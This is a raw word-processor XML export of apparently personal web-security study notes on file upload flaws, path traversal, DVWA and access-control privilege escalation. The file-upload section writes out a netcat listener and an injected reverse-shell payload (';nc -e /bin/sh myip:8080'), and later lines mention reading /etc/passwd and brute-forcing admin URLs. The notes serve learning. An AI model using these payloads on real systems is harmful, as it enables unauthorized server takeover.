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150"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>File Upload / File Intrusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Ref: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>S</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pin the hack YouTube channel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create server to listen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>c -vv -l -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If the server is executing the commands then following injection will make us take over entire server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>;nc -e /bin/sh myip:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>nc is namecat command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA: Damn vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Web App</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The impact of file upload vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Which aspect of the file the website fails to validate properly, whether that be its size, type, contents, and so on. (denial of service or full take over)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>What restrictions are imposed on the file once it has been successfully uploaded. (if the file is allowed to be executed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>File Upload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b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File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size. Failing to properly enforce restrictions on these could mean that even a basic image upload function can be used to upload arbitrary and potentially dangerous files instead. This could even include server-side script files that enable remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b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File type check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b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Blacklisted file type but some obscureity of file type is present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b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Flawed file type validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Text data in from has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">www-form-url-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>type for post</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">File/Binary data has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>multipart/form-data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>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b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Traversal vulnerablility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>check if filename of the image can access normal files like /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="160"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ACL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ccess control )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="160"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i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Access control is the application of constraints on who or what is authorized to perform actions or access resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="160"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i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 xml:space="preserve">On Web : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="160"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> confirms that the user is who they say they are.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> identifies which subsequent HTTP requests are being made by that same user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> determines whether the user is allowed to carry out the action that they are attempting to perform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vertical privilege escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="280" w:after="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unprotected functionality: Only Url change is required to access admin priviledges. So either this URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
            <w:b w:val="false"/>
            <w:bCs/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:color w:val="000000"/>
            <w:spacing w:val="0"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>https://insecure-website.com/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or  </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:color w:val="000000"/>
            <w:spacing w:val="0"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>https://insecure-website.com/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals the information of the admin page or use a word list to access admin page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1) Check robot.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2) Brutforce the file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3) check for admin url in js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Go to target of Burp and you will see the mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4) Parameter-based access control methods</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
